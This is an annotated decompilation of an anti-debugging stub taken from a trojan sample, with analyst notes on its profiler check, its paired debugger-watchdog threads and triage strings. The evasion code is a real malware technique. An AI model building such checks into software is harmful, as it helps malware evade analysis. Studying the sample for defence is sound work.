// Decompiled with JetBrains decompiler
// Type: 隬쪩夝횸抖뾟㌌豜
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: F8CCC811-F0AE-43F4-8180-670E2BBAD259
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Threading;
/// <summary>
/// Analyst summary: anti-analysis stub. At start-up it terminates the process when
/// CLR profiling environment variables are present, then runs two background threads
/// that each terminate the process when a managed debugger is attached or when the
/// partner thread is no longer alive.
/// </summary>
// NOTE(review): the structure and the three FailFast messages resemble the anti-debug
// runtime injected by the Confuser 1.x protector; confirm before attributing this class
// to the sample's author rather than to the packer.
// Triage aid: "Profiler detected", "Debugger detected (Managed)" and "Loop broken" are
// plain string literals here, and Environment.FailFast records its message when it kills
// the process, so a crash carrying one of them in a sandbox points at this stub.
internal static class 隬쪩夝횸抖뾟\u330C豜
{
    // The three native imports below are declared but not called by either method in this class.
    // NOTE(review): PreserveSig = false is unusual for APIs that return NTSTATUS/BOOL; it may be
    // a decompiler artefact. Verify against the IL before relying on these signatures.
    [DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern int \u2530랂哩뎖槧ᔥ讐椎(IntPtr ProcessHandle, int ProcessInformationClass, byte[] ProcessInformation, uint ProcessInformationLength, out int ReturnLength);

    [DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
    private static extern uint 囃ᯔꊾ䙾쳹蜊퀽\uEE20(IntPtr ProcessHandle, int ProcessInformationClass, byte[] ProcessInformation, uint ProcessInformationLength);

    [DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
    private static extern bool 蟌߇長噇盏\uF89F\uEE35屛(IntPtr hObject);

    /// <summary>
    /// Start-up hook: runs the profiler check once, then launches the paired watchdog threads.
    /// </summary>
    public static void 䶏ﮑ圕ᖌ\u2730怴\uEF09ᬤ()
    {
        // Presence is the only test: any non-null value of either variable triggers the abort.
        // COR_PROFILER is read only when COR_ENABLE_PROFILING is absent (short-circuit).
        bool profilingConfigured =
            Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING") != null
            || Environment.GetEnvironmentVariable("COR_PROFILER") != null;
        if (profilingConfigured)
        {
            Environment.FailFast("Profiler detected");
        }

        // Both threads run the same routine; each receives the other as its argument so that
        // suspending or killing one of them is noticed by its partner.
        ParameterizedThreadStart watchdog = 隬쪩夝횸抖뾟\u330C豜.\uFD40쿑\uE258豅ﺿ\u2316\uE307\uFFFD;
        Thread first = new Thread(watchdog) { IsBackground = true };
        Thread second = new Thread(watchdog) { IsBackground = true };

        first.Start((object) second);
        // The second thread starts 500 ms later; the first one waits 1000 ms before its first
        // liveness check, so the partner is already running by then.
        Thread.Sleep(500);
        second.Start((object) first);
    }

    /// <summary>
    /// Watchdog body: polls once per second for a managed debugger and for the partner thread's liveness.
    /// </summary>
    /// <param name="thread">The partner <see cref="Thread"/> to monitor, passed as object.</param>
    private static void \uFD40쿑\uE258豅ﺿ\u2316\uE307\uFFFD(object thread)
    {
        Thread.Sleep(1000);
        Thread partner = (Thread) thread;

        for (;;)
        {
            // Only the managed debugger state is inspected here (System.Diagnostics.Debugger).
            bool debuggerSeen = Debugger.IsAttached || Debugger.IsLogging();
            if (debuggerSeen)
            {
                Environment.FailFast("Debugger detected (Managed)");
            }

            // A dead partner is treated as tampering with the watchdog pair.
            if (!partner.IsAlive)
            {
                Environment.FailFast("Loop broken");
            }

            Thread.Sleep(1000);
        }
    }
}